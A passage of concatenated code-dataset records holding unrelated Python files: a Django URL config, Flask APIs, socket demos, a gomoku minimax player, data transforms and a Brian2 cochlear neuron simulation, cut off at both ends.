p1_list_str.endswith(champ_str):\n champ_str_flag = True\n elif p1_list_str.endswith(champ_str + \"s\"):\n champ_str_flag = True\n\n if champ_str_flag:\n champ_index = pre_c1_title.rfind(p1_list_str)\n if champ_index >= p1_index:\n p1_index = champ_index + len(p1_list_str)\n\n # Remove abbreviations (ie. WSFs, LFs, etc)\n for abbrev_str in abbrev_str_list:\n abbrev_str_flag = False\n if p1_list_str == abbrev_str:\n abbrev_str_flag = True\n elif p1_list_str == abbrev_str + \"s\":\n abbrev_str_flag = True\n if abbrev_str_flag:\n abbrev_index = pre_c1_title.rfind(p1_list_str)\n if abbrev_index >= p1_index:\n p1_index = abbrev_index + len(p1_list_str)\n\n # Remove string number combinations (ie. SWS 69, #9, etc)\n if p1_list_str[-1].isdigit():\n digit_str_flag = False\n prev_p1_list_index = max(0, p1_list.index(p1_list_str) - 1)\n prev_p1_index = pre_c1_title.rfind(p1_list[prev_p1_list_index])\n dig_search_index = 0\n if not p1_list_str.isdigit():\n digit_str_flag = True\n elif prev_p1_index >= p1_index:\n if not p1_list[prev_p1_list_index].isdigit():\n digit_str_flag = True\n dig_search_index = prev_p1_index\n dig_search_index += len(p1_list[prev_p1_list_index])\n if digit_str_flag:\n dig_index = pre_c1_title.find(p1_list_str, dig_search_index)\n if dig_index >= p1_index:\n p1_index = dig_index + len(p1_list_str)\n\n return p1_index\n\n\ndef format_player_str(player_str):\n player_index_list = [0]\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n if player_str[0:1] == \". \":\n player_index_list.append(2)\n\n if player_str:\n player_index_list = [0]\n for p_sep_str in [\"|\", \"/\", \",\", \"`\", \" \", \"+ \", \" l \"]:\n if p_sep_str in player_str:\n p_sep_index = player_str.rfind(p_sep_str) + len(p_sep_str)\n player_index_list.append(p_sep_index)\n\n player_str = player_str[max(player_index_list):]\n\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n while player_str:\n dot_index = player_str.find(\".\")\n if player_str[:dot_index].isupper() and dot_index > 1:\n if dot_index < (len(player_str) - 1):\n player_str = player_str[dot_index + 1:]\n continue\n break\n\n for strip_str in [\" \", \"-\", \",\", \"/\", \"&\", \" \"]:\n player_str = player_str.lstrip(strip_str).rstrip(strip_str)\n\n return player_str\n","sub_path":"format_tools.py","file_name":"format_tools.py","file_ext":"py","file_size_in_byte":11958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"272011093","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.post_list, name='post_list'),\n path('post//', views.post_detail, name='post_detail'),\n path('post/new/', views.post_new, name='post_new'),\n path('post//edit/', views.post_edit, name='post_edit'),\n path('bio', views.bio_page, name='bio_page'),\n path('cv', views.cv_page, name='cv_page'),\n path('cv/experience/new/', views.experience_new, name='experience_new'),\n path('cv/experience//edit', views.experience_edit, name='experience_edit'),\n path('cv/skill/new/', views.skill_new, name='skill_new'),\n path('cv/project/new/', views.project_new, name='project_new'),\n path('cv/project//edit', views.project_edit, name='project_edit'),\n path('cv/involvement/new/', views.involvement_new, name='involvement_new'),\n path('cv/involvement//edit', views.involvement_edit, name='involvement_edit'),\n]","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"380993866","text":"from widget import *\n\nclass State:\n Charging = 1\n Discharging = 2\n Full = 3\n Unknown = 4\n\n def __init__(self, present, status, capacity):\n self.present = present\n self.status = status\n self.capacity = capacity\n\n def __str__(self):\n if (not self.present):\n return 'BAT --'\n elif (self.status == State.Charging):\n return 'BAT %d+%%' % self.capacity\n elif (self.status == State.Full):\n return 'BAT Full'\n return 'BAT %d%%' % self.capacity\n\nclass StateReader:\n Path = '/sys/class/power_supply/BAT0/'\n\n def __init__(self):\n pass\n\n def GetState(self):\n pres = self.IsPresent()\n if (not pres):\n return State(False, State.Unknown, 0)\n return State(True, self.ReadStatus(), self.ReadCapacity())\n\n def ReadLine(self, path):\n content = None\n with open(path) as f:\n content = f.readline()\n return content\n\n def StateStrToState(self, state):\n if (state == 'Full\\n'):\n return State.Full\n elif (state == 'Charging\\n'):\n return State.Charging\n elif (state == 'Unknown\\n'):\n return State.Unknown\n else:\n return State.Discharging\n\n def IsPresent(self):\n pres = self.ReadLine(StateReader.Path + 'present')\n if (pres[0] == '1'):\n return True\n return False\n\n def ReadStatus(self):\n statusStr = self.ReadLine(StateReader.Path + 'status')\n return self.StateStrToState(statusStr)\n\n def ReadCapacity(self):\n percent = self.ReadLine(StateReader.Path + 'capacity')\n return int(percent)\n\n\n\nclass BatteryWidget(Widget):\n def __init__(self):\n self.frame = WidgetFrame()\n self.SetProp(Prop.name, 'battery')\n self.statereader = StateReader()\n\n def GetColor(self, state):\n if (state.present and state.status == State.Discharging):\n return '#ff7744'\n return '#4477ff'\n\n def DecideUpdateTime(self, state):\n if (state.status == State.Discharging):\n return 0.5\n return 10.0\n\n def Update(self):\n state = self.statereader.GetState()\n self.SetProp(Prop.full_text, str(state))\n self.SetUpdateTime(self.DecideUpdateTime(state))\n color = self.GetColor(state)\n self.SetProp(Prop.color, color)\n","sub_path":"i3widgets/widgets/battery.py","file_name":"battery.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"497327897","text":"\"\"\"\n非阻塞IO演示\n\"\"\"\n\nfrom socket import *\nfrom time import sleep,ctime\n\n# 创建tcp套接字\nsockfd = socket()\nsockfd.bind((\"0.0.0.0\",8888))\nsockfd.listen(5)\n\nfile = open(\"my.log\",'a') # 日志文件\n\n# 设置套接字为非阻塞\n# sockfd.setblocking(False)\n\n# 设置超时检测\nsockfd.settimeout(3)\n\nwhile True:\n print(\"Waiting for connect\")\n # 阻塞位置\n try:\n connfd,addr = sockfd.accept()\n print(\"Connect from\",addr)\n except BlockingIOError as e:\n # 没有客户端连接\n sleep(2)\n msg = \"%s: %s\\n\"%(ctime(),e)\n file.write(msg)\n except timeout as e:\n msg = \"%s: %s\\n\" % (ctime(), e)\n file.write(msg)\n else:\n data = connfd.recv(1024)\n print(data.decode())\n","sub_path":"month02/day16/block_io.py","file_name":"block_io.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"515672065","text":"#!/usr/bin/env python3\n\nfrom board import Board2dArr as Board\n\n\nclass BrainMinimax(object):\n\n def __init__(self, board_size, max_minimax_depth=2):\n if board_size < 1:\n raise ValueError('Unsupported board size')\n self.board_size = board_size\n self.board = Board(board_size)\n self.max_minimax_depth = max_minimax_depth\n\n def update_state(self, p, x, y):\n # note that player p has made a move at coordinate x, y\n if p != 1 and p != 2:\n raise ValueError('p must be 1 or 2, got:', p)\n self.board.update(p, x, y)\n\n def make_move(self):\n # return coordinates at which this player wants to make a move\n if len(self.board) == 0:\n # empty board\n # pick a move by simple heuristics\n x, y = self.opening_move()\n else:\n # board has moves on it\n # use minimax algorithm\n x, y = self.find_best_move()\n self.update_state(1, x, y)\n # print(self.board)\n # print(self.board.board_cols)\n return x, y\n\n def undo_state(self, x, y):\n self.board.update(0, x, y)\n\n def find_best_move(self):\n # find the best move that should be made next\n best = max(((x, y) for (x, y) in self.next_moves()),\n key=lambda move: self.simulate_move(move[0], move[1], self.minimax, \n True, 0, float('-inf'), float('inf')))\n return best\n\n def minimax(self, max_turn, curr_depth, alpha, beta):\n # use minimax algorithm to find best move\n # optimized with alpha-beta pruning\n if curr_depth == self.max_minimax_depth:\n # terminal state (base case)\n return self.evaluation_function()\n\n # recursive case\n if max_turn:\n # maximizer's turn\n opt = max # optimization function\n guess = float('-inf') # initial value for score\n else:\n # minimizer's turn\n opt = min\n guess = float('inf')\n\n best_score = guess # initialize guess\n for x, y in self.next_moves():\n best_score = self.simulate_move(x, y, \n lambda args: opt(args[0], self.minimax(*args[1:])),\n (best_score, False, curr_depth+1, alpha, beta))\n if max_turn:\n # choose which local pruning variable to update\n alpha = opt(best_score, alpha)\n else:\n beta = opt(best_score, beta)\n\n if beta <= alpha:\n # alpha-beta prune\n break\n\n return best_score\n\n def simulate_move(self, x, y, callback, *args):\n # do a move (as own player), call callback, undo move\n # return callback's value\n # use internal board state structure\n # do not copy for memory efficiency\n self.update_state(1, x, y)\n val = callback(*args)\n self.undo_state(x, y)\n return val\n\n def next_moves(self):\n # return a generator of possible next moves\n for (x, y) in self.board.next_moves_neighbour(-1):\n # print('check move: {},{}'.format(x, y), flush=True, end=', ')\n yield (x, y)\n # print('', flush=True)\n\n def opening_move(self):\n # return a move for an empty board\n return self.board.middle_move()\n\n def evaluation_function(self):\n # TODO idea: evaluation function for a single move (not the entire board???)\n return self.board.evaluate()\n","sub_path":"year3_1920/epitech/minimax_gomoku/brain_minimax.py","file_name":"brain_minimax.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487489600","text":"from flask import request, jsonify\nfrom . import api\nfrom .response import response\nfrom app.auth.user_handler import get_uid\nfrom app.controller import event_controller as ec\n\nID = 1\nNAME = '王大明'\nprefix = 'event'\n\n\n@api.route('%s' % prefix, methods=['POST'])\ndef create_event():\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.create(request.form, get_uid())\n return jsonify(result), 200\n\n\n@api.route('%s' % prefix, methods=['GET'])\ndef index_event():\n result = ec.index()\n return jsonify(result), 200\n\n\n@api.route('%s/' % prefix, methods=['GET'])\ndef show_event(eid):\n result = ec.show(eid)\n return jsonify(result), 200\n\n\n@api.route('%s/' % prefix, methods=['PATCH'])\ndef update_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.update(eid, request.form, get_uid())\n if result == 403:\n return response(403, message='current user is not the author')\n elif result == 402:\n return response(402, message='patch content error')\n elif result is not None:\n return jsonify(result), 200\n else:\n return {'message': 'PATCH failed'}, 402\n\n\n@api.route('%s/' % prefix, methods=['DELETE'])\ndef delete_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n\n result = ec.destroy(eid, get_uid())\n if result == 403:\n return response(403, message='current user is not the author')\n else:\n return '', 204\n\n\n@api.route('%s//follow' % prefix, methods=['POST'])\ndef follow_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n return '', ec.follow(eid, get_uid())\n\n\n@api.route('%s//follow' % prefix, methods=['DELETE'])\ndef delete_follow_event(eid):\n # uid = get_uid()\n # if uid is None:\n # return response(403, message='not login')\n return '', ec.destroy_follow(eid, get_uid())\n","sub_path":"app/api/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"106564344","text":"\"\"\"\nUDP应用\n即时消息发送\n丢包率\n\n使用udp协议做socket\n两个socket对象之间通信\n\"\"\"\nimport socket\ns=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\ns.bind((\"127.0.0.1\",8888))\n\n# udp中不需要下面两个方法\n# s.listen()\n# s.accept()\n\n# 接受信息\nprint(s.recv(1024).decode())\n","sub_path":"python1808real/day20/day20-1-udpserver.py","file_name":"day20-1-udpserver.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"589212415","text":"import numpy as np\nimport torch\nfrom .base import Transform\n\n\nclass Normalize(Transform):\n \"\"\"Normalizes input to zero mean unit variance.\"\"\"\n def __init__(self, eps=1e-4, **super_kwargs):\n \"\"\"\n Parameters\n ----------\n eps : float\n A small epsilon for numerical stability.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(Normalize, self).__init__(**super_kwargs)\n self.eps = eps\n\n def tensor_function(self, tensor):\n tensor = (tensor - tensor.mean())/(tensor.std() + self.eps)\n return tensor\n\n\nclass NormalizeRange(Transform):\n \"\"\"Normalizes input by a constant.\"\"\"\n def __init__(self, normalize_by=255., **super_kwargs):\n \"\"\"\n Parameters\n ----------\n normalize_by : float or int\n Scalar to normalize by.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(NormalizeRange, self).__init__(**super_kwargs)\n self.normalize_by = float(normalize_by)\n\n def tensor_function(self, tensor):\n return tensor / self.normalize_by\n\n\nclass Cast(Transform):\n \"\"\"Casts inputs to a specified datatype.\"\"\"\n DTYPE_MAPPING = {'float32': 'float32',\n 'float': 'float32',\n 'double': 'float64',\n 'float64': 'float64',\n 'half': 'float16',\n 'float16': 'float16'}\n\n def __init__(self, dtype='float', **super_kwargs):\n \"\"\"\n Parameters\n ----------\n dtype : {'float16', 'float32', 'float64', 'half', 'float', 'double'}\n Datatype to cast to.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(Cast, self).__init__(**super_kwargs)\n assert dtype in self.DTYPE_MAPPING.keys()\n self.dtype = self.DTYPE_MAPPING.get(dtype)\n\n def tensor_function(self, tensor):\n return getattr(np, self.dtype)(tensor)\n\n\nclass AsTorchBatch(Transform):\n \"\"\"Converts a given numpy array to a torch batch tensor.\n\n The result is a torch tensor __without__ the leading batch axis. For example,\n if the input is an image of shape `(100, 100)`, the output is a batch of shape\n `(1, 100, 100)`. The collate function will add the leading batch axis to obtain\n a tensor of shape `(N, 1, 100, 100)`, where `N` is the batch-size.\n \"\"\"\n def __init__(self, dimensionality, **super_kwargs):\n \"\"\"\n Parameters\n ----------\n dimensionality : {1, 2, 3}\n Dimensionality of the data: 1 if vector, 2 if image, 3 if volume.\n super_kwargs : dict\n Kwargs to the superclass `inferno.io.transform.base.Transform`.\n \"\"\"\n super(AsTorchBatch, self).__init__(**super_kwargs)\n assert dimensionality in [1, 2, 3]\n self.dimensionality = dimensionality\n\n def tensor_function(self, tensor):\n assert isinstance(tensor, np.ndarray)\n if self.dimensionality == 3:\n # We're dealing with a volume. tensor can either be 3D or 4D\n assert tensor.ndim in [3, 4]\n if tensor.ndim == 3:\n # Add channel axis\n return torch.from_numpy(tensor[None, ...])\n else:\n # Channel axis is in already\n return torch.from_numpy(tensor)\n elif self.dimensionality == 2:\n # We're dealing with an image. tensor can either be 2D or 3D\n assert tensor.ndim in [2, 3]\n if tensor.ndim == 2:\n # Add channel axis\n return torch.from_numpy(tensor[None, ...])\n else:\n # Channel axis is in already\n return torch.from_numpy(tensor)\n elif self.dimensionality == 1:\n # We're dealing with a vector - it has to be 1D\n assert tensor.ndim == 1\n return torch.from_numpy(tensor)\n else:\n raise NotImplementedError\n","sub_path":"inferno/io/transform/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":4106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"527134753","text":"from flask import Flask, render_template\r\nimport random\r\napp = Flask(__name__)\r\n\r\n\r\n \r\n\r\n@app.route(\"/dictionary/\")\r\ndef dictionary(word):\r\n dict = {'apple':'사과','kid':'아이','cloth':'천','book':'책'}\r\n \r\n result = dict.get(word)\r\n if result:\r\n result = f\"{word}는 {result}입니다.\"\r\n else:\r\n result = f\"{word}는 단어장에 없는 단어입니다.\"\r\n \r\n return render_template(\"dictionary.html\",result=result)\r\n \r\n # if word in dict.keys():\r\n # mean = dict[word]\r\n # else:\r\n # mean = \"나만의 단어장에 없음\"\r\n\r\n # return render_template(\"dictionary.html\", word=word, mean=mean)\r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True,host=\"0.0.0.0\",port=8080)","sub_path":"workshop/workshop8/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"622959863","text":"from mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\nfrom graphviz import Digraph\nimport os\nos.environ[\"PATH\"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'\nfrom mscatter import mscatter\nimport numpy as np\n\n\nclass Network:\n def __init__(self, in_neurons=list(), out_neurons=list()):\n self.in_neurons = in_neurons\n self.out_neurons = out_neurons\n\n for in_neuron in self.in_neurons:\n in_neuron.outs = list() # why is this necessary?\n for out_neuron in self.out_neurons:\n in_neuron.project_to(out_neuron)\n\n def update_inputs(self, activations):\n for i in range(len(activations)):\n self.in_neurons[i].activation = activations[i]\n\n def print_ins(self):\n out_str = \"Inputs: \"\n\n for neuron in self.in_neurons:\n out_str += str(neuron.activation) + \" \"\n\n print(out_str)\n\n def draw_network(self):\n '''\n dot = Digraph()\n dot.node('A', 'A')\n dot.node('B', 'B')\n dot.node('C', 'C')\n dot.edges(['AB', 'AB', 'AB', 'BC', 'BA', 'CB'])\n\n print(dot.source)\n dot.render(\"graph.png\", view=True)\n '''\n\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n\n xdata = []\n ydata = []\n zdata = []\n mdata = []\n adata = []\n\n neurons = self.in_neurons.copy()\n neurons.extend(self.out_neurons)\n\n for neuron in neurons:\n xdata.append(neuron.pos[0])\n ydata.append(neuron.pos[1])\n zdata.append(neuron.pos[2])\n if neuron.is_input:\n mdata.append('x')\n elif neuron.is_output:\n mdata.append('o')\n adata.append(neuron.activation)\n\n xdata.append(0) # Dummy 1 neuron\n ydata.append(0)\n zdata.append(0)\n adata.append(1)\n mdata.append('^')\n\n xdata.append(0) # Dummy 0 neuron\n ydata.append(0)\n zdata.append(0)\n adata.append(0)\n mdata.append('^')\n\n mscatter(xdata, ydata, zdata, m=mdata, c=adata, cmap='plasma')\n\n for neuron in neurons:\n for projected in neuron.outs:\n n1 = neuron.pos[0]\n n2 = neuron.pos[1]\n n3 = neuron.pos[2]\n p1 = projected.pos[0]\n p2 = projected.pos[1]\n p3 = projected.pos[2]\n ax.plot([n1, p1], [n2, p2], [n3, p3], color='Grey')\n\n plt.show()\n\n\n","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"75700330","text":"# -*- coding: utf-8 -*-\n\"\"\"\nDownloaded from Brian2 website on Sat Jan 13 10:02:04 2018\n\nCochlear neuron model of Rothman & Manis\n----------------------------------------\nRothman JS, Manis PB (2003) The roles potassium currents play in\nregulating the electrical activity of ventral cochlear nucleus neurons.\nJ Neurophysiol 89:3097-113.\n\nAll model types differ only by the maximal conductances.\n\nAdapted from their Neuron implementation by Romain Brette\n\"\"\"\n#from brian2 import *\nfrom brian2 import mV, pA, pF, nS, ms, second, Hz\nfrom brian2 import NeuronGroup\nfrom brian2 import StateMonitor, run\nfrom brian2 import defaultclock\nfrom math import exp\nimport numpy as np\nimport matplotlib.pyplot as plt\n#from matplotlib.ticker import ScalarFormatter\n#for axis in [ax.xaxis, ax.yaxis]:\n# axis.set_major_formatter(ScalarFormatter())\n \ndefaultclock.dt=0.02*ms # for better precision\n\n'''\nSimulation parameters: choose current amplitude and neuron type\n(from type1c, type1t, type12, type 21, type2, type2o)\n'''\nneuron_type = 'LsoNp1b'\nnLsons = 1 # number of LSO neurons\ntemp_degC=22.\nVrest = -62.5*mV # observed resting potential for model LsoNp1b\n\nC = 12*pF # 21.7pF: non-principal LSO neuron (Barnes-Davies et al. 2004)\nEh = -43*mV\nEK = -70*mV # -77*mV in mod file\nEl = -65*mV\nENa = 50*mV\nnf = 0.85 # proportion of n vs p kinetics\nzss = 0.5 # steady state inactivation of glt\nq10 = 3. ** ((temp_degC - 22) / 10.)\n# hcno current (octopus cell)\nfrac = 0.0\nqt = 4.5 ** ((temp_degC - 33.) / 10.)\n\n# Maximal conductances of different cell types in nS\nmaximal_conductances = dict(\nLsoNp1b=(2000, 300, 0, 0, 24, 0, 24),\ntype1c=(1000, 150, 0, 0, 0.5, 0, 2),\ntype1t=(1000, 80, 0, 65, 0.5, 0, 2),\ntype12=(1000, 150, 20, 0, 2, 0, 2),\ntype21=(1000, 150, 35, 0, 3.5, 0, 2),\ntype2=(1000, 150, 200, 0, 20, 0, 2),\ntype2g2x=(2000, 300, 400, 0, 40, 0, 2),\ntype2g1p5x=(1000, 150, 300, 0, 30, 0, 2),\ntype2g1p2x=(1200, 180, 240, 0, 24, 0, 2),\ntype2g0p5x=(1000, 150, 100, 0, 10, 0, 2),\ntype2o=(1000, 150, 600, 0, 0, 40, 2) # octopus cell\n)\ngnabar, gkhtbar, gkltbar, gkabar, ghbar, gbarno, gl = [x * nS for x in maximal_conductances[neuron_type]]\n\n# Classical Na channel\neqs_na = \"\"\"\nina = gnabar*m**3*h*(ENa-v) : amp\ndm/dt=q10*(minf-m)/mtau : 1\ndh/dt=q10*(hinf-h)/htau : 1\nminf = 1./(1+exp(-(vu + 38.) / 7.)) : 1\nhinf = 1./(1+exp((vu + 65.) / 6.)) : 1\nmtau = ((10. / (5*exp((vu+60.) / 18.) + 36.*exp(-(vu+60.) / 25.))) + 0.04)*ms : second\nhtau = ((100. / (7*exp((vu+60.) / 11.) + 10.*exp(-(vu+60.) / 25.))) + 0.6)*ms : second\n\"\"\"\n\n# KHT channel (delayed-rectifier K+)\neqs_kht = \"\"\"\nikht = gkhtbar*(nf*n**2 + (1-nf)*p)*(EK-v) : amp\ndn/dt=q10*(ninf-n)/ntau : 1\ndp/dt=q10*(pinf-p)/ptau : 1\nninf = (1 + exp(-(vu + 15) / 5.))**-0.5 : 1\npinf = 1. / (1 + exp(-(vu + 23) / 6.)) : 1\nntau = ((100. / (11*exp((vu+60) / 24.) + 21*exp(-(vu+60) / 23.))) + 0.7)*ms : second\nptau = ((100. / (4*exp((vu+60) / 32.) + 5*exp(-(vu+60) / 22.))) + 5)*ms : second\n\"\"\"\n\n# Ih channel (subthreshold adaptive, non-inactivating)\neqs_ih = \"\"\"\nih = ghbar*r*(Eh-v) : amp\ndr/dt=q10*(rinf-r)/rtau : 1\nrinf = 1. / (1+exp((vu + 76.) / 7.)) : 1\nrtau = ((100000. / (237.*exp((vu+60.) / 12.) + 17.*exp(-(vu+60.) / 14.))) + 25.)*ms : second\n\"\"\"\n\n# KLT channel (low threshold K+)\neqs_klt = \"\"\"\niklt = gkltbar*w**4*z*(EK-v) : amp\ndw/dt=q10*(winf-w)/wtau : 1\ndz/dt=q10*(zinf-z)/wtau : 1\nwinf = (1. / (1 + exp(-(vu + 48.) / 6.)))**0.25 : 1\nzinf = zss + ((1.-zss) / (1 + exp((vu + 71.) / 10.))) : 1\nwtau = ((100. / (6.*exp((vu+60.) / 6.) + 16.*exp(-(vu+60.) / 45.))) + 1.5)*ms : second\nztau = ((1000. / (exp((vu+60.) / 20.) + exp(-(vu+60.) / 8.))) + 50)*ms : second\n\"\"\"\n\n# Ka channel (transient K+)\neqs_ka = \"\"\"\nika = gkabar*a**4*b*c*(EK-v): amp\nda/dt=q10*(ainf-a)/atau : 1\ndb/dt=q10*(binf-b)/btau : 1\ndc/dt=q10*(cinf-c)/ctau : 1\nainf = (1. / (1 + exp(-(vu + 31) / 6.)))**0.25 : 1\nbinf = 1. / (1 + exp((vu + 66) / 7.))**0.5 : 1\ncinf = 1. / (1 + exp((vu + 66) / 7.))**0.5 : 1\natau = ((100. / (7*exp((vu+60) / 14.) + 29*exp(-(vu+60) / 24.))) + 0.1)*ms : second\nbtau = ((1000. / (14*exp((vu+60) / 27.) + 29*exp(-(vu+60) / 24.))) + 1)*ms : second\nctau = ((90. / (1 + exp((-66-vu) / 17.))) + 10)*ms : second\n\"\"\"\n\n# Leak\neqs_leak = \"\"\"\nileak = gl*(El-v) : amp\n\"\"\"\n\n# h current for octopus cells\neqs_hcno = \"\"\"\nihcno = gbarno*(h1*frac + h2*(1-frac))*(Eh-v) : amp\ndh1/dt=(hinfno-h1)/tau1 : 1\ndh2/dt=(hinfno-h2)/tau2 : 1\nhinfno = 1./(1+exp((vu+66.)/7.)) : 1\ntau1 = bet1/(qt*0.008*(1+alp1))*ms : second\ntau2 = bet2/(qt*0.0029*(1+alp2))*ms : second\nalp1 = exp(1e-3*3*(vu+50)*9.648e4/(8.315*(273.16+temp_degC))) : 1\nbet1 = exp(1e-3*3*0.3*(vu+50)*9.648e4/(8.315*(273.16+temp_degC))) : 1 \nalp2 = exp(1e-3*3*(vu+84)*9.648e4/(8.315*(273.16+temp_degC))) : 1\nbet2 = exp(1e-3*3*0.6*(vu+84)*9.648e4/(8.315*(273.16+temp_degC))) : 1\n\"\"\"\n\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#I = I_Bias: amp\n#\"\"\"\neqs = \"\"\"\ndv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\nvu = v/mV : 1 # unitless v\nI = I_Bias + I_Zap_Max * sin(2*pi*(m1000*(t - (t_settle+t_bias)) + f_min) * (t - (t_settle+t_bias))) : amp\n#\"\"\"\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#if (t_settle <= t < (t_settle + sweepdur)):\n# I = I_Bias + I_Zap_Max * sin(2*pi*(m1000*(t - t_settle) + f_min) * (t - t_settle)): amp\n#else:\n# I = 0: amp\n#\n#\"\"\"\n#eqs = \"\"\"\n#dv/dt = (ileak + ina + ikht + iklt + ika + ih + ihcno + I)/C : volt\n#vu = v/mV : 1 # unitless v\n#if (t_settle <= t < (t_settle + sweepdur)):\n# I = I_Bias: amp\n#else:\n# I = 0: amp\n#\n#\"\"\"\neqs += eqs_leak + eqs_ka + eqs_na + eqs_ih + eqs_klt + eqs_kht + eqs_hcno\n\n#neuron = NeuronGroup(1, eqs, method='exponential_euler')\n#neuron.v = El\n\nlsonGrp = NeuronGroup(nLsons, eqs, method='exponential_euler')\n# Initialize model near v_rest with no inputs\nlsonGrp.v = Vrest\n#vu = EL/mV # unitless v\nvu = lsonGrp.v/mV # unitless v\nlsonGrp.m = 1./(1+exp(-(vu + 38.) / 7.))\nlsonGrp.h = 1./(1+exp((vu + 65.) / 6.))\nlsonGrp.n = (1 + exp(-(vu + 15) / 5.))**-0.5\nlsonGrp.p = 1. / (1 + exp(-(vu + 23) / 6.))\nlsonGrp.r = 1. / (1+exp((vu + 76.) / 7.))\nlsonGrp.w = (1. / (1 + exp(-(vu + 48.) / 6.)))**0.25\nlsonGrp.z = zss + ((1.-zss) / (1 + exp((vu + 71.) / 10.)))\nlsonGrp.a = (1. / (1 + exp(-(vu + 31) / 6.)))**0.25\nlsonGrp.b = 1. / (1 + exp((vu + 66) / 7.))**0.5\nlsonGrp.c = 1. / (1 + exp((vu + 66) / 7.))**0.5\nlsonGrp.h1 = 1./(1+exp((vu+66.)/7.))\nlsonGrp.h2 = 1./(1+exp((vu+66.)/7.))\n\n#I_Gate = 1\n# Current input / Zap frequency-sweep parameters\nI_Bias = 0*pA\nI_Zap_Max = 0*pA\nsweepdur = 1*second\n#sweepdur_ms = 960*ms\n#f_max = 100*Hz\nf_max = 2000*Hz\nf_min = 1*Hz\nm1000 = (f_max - f_min)/(2*(sweepdur - defaultclock.dt))\nt_settle = 50*ms\nt_bias = 450*ms\n#zap1000_0p96 = I_Zap_Max * sin(2*pi*(m1000*(t - t_settle) + f_min) * (t - t_settle));\n\n#M = StateMonitor(lsonGrp, 'v', record=True)\nM = StateMonitor(lsonGrp, ['v','I'], record=True)\nrun(t_settle, report='text') # Go to rest\n\nI_Bias = 100.*pA\nrun(t_bias, report='text') # Equilibrate to I_Bias\nIBiasStr = 'IBias' + str(int(I_Bias/pA)) + 'pA'\n\nI_Zap_Max = 10*pA\nrun(sweepdur, report='text') # Apply Zap current\nIZapMaxStr = 'IZapMax' + str(int(I_Zap_Max/pA)) + 'pA'\n\nI_Zap_Max = 0.*pA\nrun(100*ms, report='text')\n\nfftStart = round((t_settle + t_bias)/defaultclock.dt)\nfftStop = round((t_settle + t_bias + sweepdur)/defaultclock.dt)\nVfft = np.fft.fft(M[0].v[fftStart:fftStop])\nIfft = np.fft.fft(M[0].I[fftStart:fftStop])\nZfft = np.divide(Vfft, Ifft)\n\n#plt.plot(M.t / ms, M[0].v / mV)\nplt.plot(M.t / ms, M[0].v / mV)\nplt.xlabel('t (ms)')\nplt.ylabel('v (mV)')\n#plt.ylim((-65,-45))\nplt.show()\n\n#plt.plot(range(5,90),abs(Vfft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.semilogx(range(10,1000),abs(Vfft[10:1000])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.show()\n\n#plt.plot(range(5,90),abs(Ifft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.semilogx(range(10,1000),abs(Ifft[10:1000])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\nplt.show()\n\n##plt.plot(range(5,90),abs(Zfft[5:90])) # For now, 1-Hz resolution, drop 0 Hz (large DC)\n##plt.rcParams.update({'font.size': 18})\n#plt.ylabel('impedance (MOhm)', fontsize=18)\n#plt.xlabel('frequency (Hz)', fontsize=18)\n#plt.semilogx(range(10,1000),abs(Zfft[10:1000])/1e6) # For now, 1-Hz resolution, drop 0 Hz (large DC)\n#plt.ylim((0,200e6))\n#plt.show()\n\ntimeVmemFileStr = 